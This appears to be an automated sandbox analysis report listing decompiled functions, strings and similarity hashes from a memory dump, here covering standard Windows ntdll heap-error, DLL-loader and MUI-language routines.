String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: e44fe5a564b3206470ebc633190bcfef6d407e540461cb2a8ca08d5485d15dcf
Instruction ID: 0256bdb467f452281102d67e3246efa1b21c5dd5dc454d237d8099c02989809d
Opcode Fuzzy Hash: e44fe5a564b3206470ebc633190bcfef6d407e540461cb2a8ca08d5485d15dcf
Instruction Fuzzy Hash: 1C61F436521941DFC251BB8AD4C6E7473E8FB60DE0B1A842FF40E7F260DA349C468B19

Uniqueness

Uniqueness Score: -1.00%

Function 014D3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E014D3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E014D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L014E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E014D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L014E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E014D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E014D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E014D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L014E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L014E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L014E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0150F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01511370(_t276, 0x14a4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0150BB40(0,  &_v68, _t170);
									if(L014D43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L014E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L014E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0150BB40(_t257,  &_v68, _t243);
								if(L014D43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01511370(_t278, 0x14a4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L014E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0150F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01511370(_v16, 0x14a4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0150BB40(_t262,  &_v68, _t244);
								if(L014D43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01511370(_t282, 0x14a4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0150BB40(_t262,  &_v68, _t201);
							if(L014D43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L014E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L014E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L014E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0150F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01511370(_t280, 0x14a4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0150BB40(_t267,  &_v68, _t245);
							if(L014D43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01511370(_t284, 0x14a4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0150BB40(_t267,  &_v68, _t224);
						if(L014D43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L014E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L014E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x014d3d3c
0x014d3d42
0x014d3d44
0x014d3d46
0x014d3d49
0x014d3d4c
0x014d3d4f
0x014d3d52
0x014d3d55
0x014d3d58
0x014d3d5b
0x014d3d5f
0x014d3d61
0x014d3d66
0x01528213
0x01528218
0x014d4085
0x014d4088
0x014d408e
0x014d4094
0x014d409a
0x014d40a0
0x014d40a6
0x014d40a9
0x014d40af
0x014d40b6
0x014d40bd
0x014d40bd
0x014d3d83
0x0152821f
0x01528229
0x01528238
0x01528238
0x0152823d
0x0152823d
0x014d3da0
0x014d3daf
0x014d3db5
0x014d3dba
0x014d3dba
0x014d3dd4
0x014d3e94
0x014d3eab
0x014d3f6d
0x014d3f84
0x014d406b
0x014d406b
0x014d406e
0x014d406e
0x014d4070
0x014d4074
0x01528351
0x01528351
0x014d407a
0x014d407f
0x0152835d
0x01528370
0x01528377
0x01528379
0x0152837c
0x0152837c
0x0152835d
0x00000000
0x014d407f
0x014d3f8a
0x014d3f8d
0x014d3f90
0x014d3f95
0x0152830d
0x0152830f
0x014d3f9b
0x014d3fac
0x014d3fae
0x014d3fb1
0x014d3fb1
0x014d3fb6
0x01528317
0x0152831a
0x00000000
0x014d3fbc
0x014d3fc1
0x014d3fc9
0x014d3fd7
0x014d3fda
0x014d3fdd
0x014d4021
0x014d4021
0x014d4029
0x014d4030
0x014d4044
0x014d4046
0x014d4046
0x014d4044
0x014d4049
0x01528327
0x01528334
0x01528339
0x0152833c
0x014d404f
0x014d404f
0x014d404f
0x014d4051
0x014d4056
0x014d4063
0x014d4063
0x014d4068
0x00000000
0x014d4068
0x014d3fdf
0x014d3fe2
0x014d3fe4
0x014d3fe7
0x014d3fef
0x014d4003
0x014d4005
0x014d4005
0x014d400c
0x014d4013
0x014d4016
0x014d4017
0x014d401b
0x014d401e
0x00000000
0x014d401e
0x014d3fb6
0x014d3eb1
0x014d3eb4
0x014d3eb7
0x014d3ebc
0x015282a9
0x015282ab
0x014d3ec2
0x014d3ed3
0x014d3ed5
0x014d3ed8
0x014d3ed8
0x014d3edd
0x015282b3
0x015282b6
0x00000000
0x014d3ee3
0x014d3ee8
0x014d3eed
0x014d3ef0
0x014d3ef3
0x014d3f02
0x014d3f05
0x014d3f08
0x015282c0
0x015282c3
0x015282c5
0x015282c8
0x015282d0
0x015282e4
0x015282e6
0x015282e6
0x015282ed
0x015282f4
0x015282f7
0x015282f8
0x015282fc
0x015282ff
0x015282ff
0x014d3f0e
0x014d3f11
0x014d3f16
0x014d3f1d
0x014d3f31
0x01528307
0x01528307
0x014d3f31
0x014d3f39
0x014d3f48
0x014d3f4d
0x014d3f50
0x014d3f50
0x014d3f53
0x014d3f58
0x014d3f65
0x014d3f65
0x014d3f6a
0x00000000
0x014d3f6a
0x014d3edd
0x014d3dda
0x014d3ddd
0x014d3de0
0x014d3de5
0x01528245
0x014d3deb
0x014d3df7
0x014d3dfc
0x014d3dfe
0x014d3e01
0x014d3e01
0x014d3e06
0x0152824d
0x0152824f
0x01528254
0x00000000
0x014d3e0c
0x014d3e11
0x014d3e16
0x014d3e19
0x014d3e29
0x014d3e2c
0x014d3e2f
0x0152825c
0x0152825f
0x01528261
0x01528264
0x0152826c
0x01528280
0x01528282
0x01528282
0x01528289
0x01528290
0x01528293
0x01528294
0x01528298
0x0152829b
0x0152829b
0x014d3e35
0x014d3e38
0x014d3e3d
0x014d3e44
0x014d3e58
0x015282a3
0x015282a3
0x014d3e58
0x014d3e60
0x014d3e6f
0x014d3e74
0x014d3e77
0x014d3e77
0x014d3e7a
0x014d3e7f
0x014d3e8c
0x014d3e8c
0x014d3e91
0x00000000
0x014d3e91

Strings

Kernel-MUI-Language-Allowed, xrefs: 014D3DC0
Kernel-MUI-Language-Disallowed, xrefs: 014D3E97
Kernel-MUI-Number-Allowed, xrefs: 014D3D8C
Kernel-MUI-Language-SKU, xrefs: 014D3F70
WindowsExcludedProcs, xrefs: 014D3D6F

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 3dfa6346eac755d6126f4cc80dcb47f1d741990b2f0fdab8373632b7e49efb8b
Instruction ID: 4f2b72bcfe17b4ff344b3a86964f4bfcb8c2ec8434abe2b0351e66686e6f4335
Opcode Fuzzy Hash: 3dfa6346eac755d6126f4cc80dcb47f1d741990b2f0fdab8373632b7e49efb8b
Instruction Fuzzy Hash: 2FF17EB2D00619EBCF12DFD9C990AEEBBF9FF59650F19005AE505AB260D7309E01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014C40E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

Invalid heap signature for heap at %p, xrefs: 01520458
RtlAllocateHeap, xrefs: 01520468
HEAP: , xrefs: 0152044C
HEAP[%wZ]: , xrefs: 0152043F
, passed to %s, xrefs: 01520469

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 2feb5cc19e7c7567aa58038a727cccbad77367d67b5f2cf25e4251b0cfa6d24b
Instruction ID: 937bdfc60a8fc9c890e6fe67ed090feb7fecf86c8b05b26338abb0cfefad88b5
Opcode Fuzzy Hash: 2feb5cc19e7c7567aa58038a727cccbad77367d67b5f2cf25e4251b0cfa6d24b
Instruction Fuzzy Hash: 39012D371011519ED265576A945EF5577A8EB62F70F2FC01FF0054B6E1CEB45444C161

Uniqueness

Uniqueness Score: -1.00%

Function 014F8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 0153933B, 01539367
LdrpFindDllActivationContext, xrefs: 01539331, 0153935D
Querying the active activation context failed with status 0x%08lx, xrefs: 01539357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0153932A

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: d0547b0e053e58da6ef9e66f881551f81b11da1dcc373b0460ddd0df5067f90d
Instruction ID: 57dbd25384fa0f0efb8c891b8530289189db93b028c3737af2ad9bb68233e230
Opcode Fuzzy Hash: d0547b0e053e58da6ef9e66f881551f81b11da1dcc373b0460ddd0df5067f90d
Instruction Fuzzy Hash: 9F410871A003179FEB366E1D8888A7B77A4BB50268F06456FEB14DF371E7705C808381

Uniqueness

Uniqueness Score: -1.00%

Function 015849A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01584A4A, 01584A5D, 01584A5F, 01584AC4
This is located in the %s field of the heap header., xrefs: 01584AD6
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01584A61
HEAP[%wZ]: , xrefs: 01584A3D, 01584AB7

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 57f4168e0afc73a096b9260405ee9a775367631a3703f5d1973c4cd3c5257c3f
Instruction ID: 242253d6a9e6b6f5cf7bc626016b38bcf09068049dff7119bfdb40f62cbb05ee
Opcode Fuzzy Hash: 57f4168e0afc73a096b9260405ee9a775367631a3703f5d1973c4cd3c5257c3f
Instruction Fuzzy Hash: B3312C35100112EFD311EB59C885F6BB7E9FF14A60F15845EF905AF2A1D6B0A844C754

Uniqueness

Uniqueness Score: -1.00%

Function 014D8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01529C28
LdrpDoPostSnapWork, xrefs: 01529C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01529C18

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 6a20b56a71547c258b0b01a271ab627319dc5e5fd6bb57e7a4681e8d43304256
Instruction ID: 0e2c8e6269c46f041cb80c23ed74b5ff2b8f37bcf8c89583fc3aaabef1898f7d
Opcode Fuzzy Hash: 6a20b56a71547c258b0b01a271ab627319dc5e5fd6bb57e7a4681e8d43304256
Instruction Fuzzy Hash: 9E912371A00217DBEF18DF59C8A1ABAB7B5FF94314B45406FE905AB261E730ED01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014D7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON

Download Yara Rule

Strings

LdrpCompleteMapModule, xrefs: 01529898
minkernel\ntdll\ldrmap.c, xrefs: 015298A2
Could not validate the crypto signature for DLL %wZ, xrefs: 01529891

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: bb25c80ef951d829a47465eb718dc78a6980c33acaa28398b52015efd2f7c329
Instruction ID: b235800e068a8e219310f5ab51df2938db98bdc5e2633b9df53b3a50533d4e05
Opcode Fuzzy Hash: bb25c80ef951d829a47465eb718dc78a6980c33acaa28398b52015efd2f7c329
Instruction Fuzzy Hash: 7D512332A00756DBEB21CB6CC864B2A7BE0FB41329F14069AE9519B3F1D770ED01C790

Uniqueness

Uniqueness Score: -1.00%

Function 014CE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 014CE68C
InstallLanguageFallback, xrefs: 014CE6DB
@, xrefs: 014CE6C0

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 8600a99d2f53b38f70a15606efc4f0dd88fdfd44b911a406dc1c501552d469e0
Instruction ID: 1912f0f233aff68cf97b5c5d33afedbbb138755fe847fa2b8723c58e4f223652
Opcode Fuzzy Hash: 8600a99d2f53b38f70a15606efc4f0dd88fdfd44b911a406dc1c501552d469e0
Instruction Fuzzy Hash: 8151167A6193129BD711DF68C440AAFB7E8BF99614F04092EF985EB290F734D904C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0158E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON

Download Yara Rule

Strings

`, xrefs: 0158E5D7
`, xrefs: 0158E670

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 225bb054a4a6a6ea2996c8ddfc8dcc35e1f2763ecdd36342a94481cc07bb7076
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 93917E312043429BE725EE29C842B1BBBE5FF84714F14892DF6A5EB290E774E904CB61

Uniqueness

Uniqueness Score: -1.00%

Function 015451BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0154521D
Legacy, xrefs: 01545226

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 69d2f11edc111bdb6a1ddf1cacedb325169fa78f59af60397a70bcc3e2a26f8f
Instruction ID: 853efe3aac2dd1cd2fe6e2d3b7afa6895b03085c31128958dec48261bfb2e897
Opcode Fuzzy Hash: 69d2f11edc111bdb6a1ddf1cacedb325169fa78f59af60397a70bcc3e2a26f8f
Instruction Fuzzy Hash: 79517C71A146099FDB25DFA8C880AAEBBF8FF58704F14446EE649EF291E6709940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 014EB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014EB9A5

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: fe405067537c845290537fe20ab3b8d092e38f2b64c0c87f4e1ef1ed247d227e
Instruction ID: c1328597b0c3019ec69de043fe6a0b050fd7705f98171fac8f4faada62b09be5
Opcode Fuzzy Hash: fe405067537c845290537fe20ab3b8d092e38f2b64c0c87f4e1ef1ed247d227e
Instruction Fuzzy Hash: 18516971A08341CFCB21CF69C4C492BBBE5FB88611F14496EF6958B365D731E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 014CB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

_vswprintf_s.LIBCMT ref: 015248AD

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 1b2ee1c00905d3ea4cb9b0775dacad1ebad5d765165564b16fa9486987d22ce6
Instruction ID: e4bc95d8ac663d4154e55b71237864a0723681be6ebab96520a68e5b78164222
Opcode Fuzzy Hash: 1b2ee1c00905d3ea4cb9b0775dacad1ebad5d765165564b16fa9486987d22ce6
Instruction Fuzzy Hash: D051D476E1026A8EEB36CF68C845BBEBBB0BF46710F1041ADD8599F2C2D7744941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 014F2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

PATH, xrefs: 014F2642, 014F2691

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: d271f906f919923d8e249af8ded6e77a9c55c4f70c14a6f6fda950c8d1907c38
Instruction ID: 4a246701627298b05e6d003aaa400715eee47afdf460bc2b0fc62a1ecabdec35
Opcode Fuzzy Hash: d271f906f919923d8e249af8ded6e77a9c55c4f70c14a6f6fda950c8d1907c38
Instruction Fuzzy Hash: BEC18171E002159BDB25DF99D880EAEBBF5FF58710F15401EE605AB3A0D7B4E941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 014FFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON

Download Yara Rule

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0153BE0F

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 8d87ad9fe6747138390ceb9bd2fb79e64cfbf576358236af943b356728f04787
Instruction ID: 563a25c07ea25f213262b78b210e73ac1be164902e34301700aedfa3c32f09c7
Opcode Fuzzy Hash: 8d87ad9fe6747138390ceb9bd2fb79e64cfbf576358236af943b356728f04787
Instruction Fuzzy Hash: 5CA1E272A006568BEB25CF69C45076EB7A4BF88710F04456FDA169B7A0EB30D84ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 014C2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0151FA4A

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 23522bb652579f5b1b6f2fc20e6196f666343cae2183dc3f576463b63da21c2d
Instruction ID: 40b285e906347d69d6ed5b72a5140d40a9cea7cd407f3064c54622e95dce250c
Opcode Fuzzy Hash: 23522bb652579f5b1b6f2fc20e6196f666343cae2183dc3f576463b63da21c2d
Instruction Fuzzy Hash: 39610431A006059BEB22DB6CC880F7E7BE5FB54B24F14066FD911AB2E1C7F499468B91

Uniqueness

Uniqueness Score: -1.00%

Function 01590EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

`, xrefs: 01590F16

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 2df74bbbcbb3bdc55d1c53dac0a515581b997c70cc6f2338377b9a18e79757c8
Instruction ID: 0c5abad02131a28320c1b558780644054e1001a36789ec4e47d68e10cb89ac3a
Opcode Fuzzy Hash: 2df74bbbcbb3bdc55d1c53dac0a515581b997c70cc6f2338377b9a18e79757c8
Instruction Fuzzy Hash: FD51AC713047429FDB25DF29D8C4B1BBBE9FBC4224F04092DFA969B290D671E905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 014FF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 014FF124

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 75c4cc375eb054fcdc821274a06fa0184e3804b863692809316ff407a918aeb6
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 6F516D715047119FC321DF59C840A6BBBF8FF98710F00892EFA959B6A0E7B4E915CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01543540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0154358F

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 72ee742c94911da6f306c7b3d9217469ca66f37de8261fd1859c5b6b5c6d8dd7
Instruction ID: 8a011bc87dc560926f99da95ded9d105d792479510640249fee874979dc7eccc
Opcode Fuzzy Hash: 72ee742c94911da6f306c7b3d9217469ca66f37de8261fd1859c5b6b5c6d8dd7
Instruction Fuzzy Hash: CC4167B1D0052E9BDB61DA90CC80FDEB77CBB54718F0045A5EA09AF291DB305E88CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 015905AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

`, xrefs: 01590633

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 1f8f63d6ef39c1ce84cba0e3b289cef21f2bb06b932a8bb54b0bb2d457fa85f7
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: DC31F2322043066BEB10DE19CC84F9A7BDDBBC4754F144529BA449F2C0D770E905CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 01543884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 015438B4

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
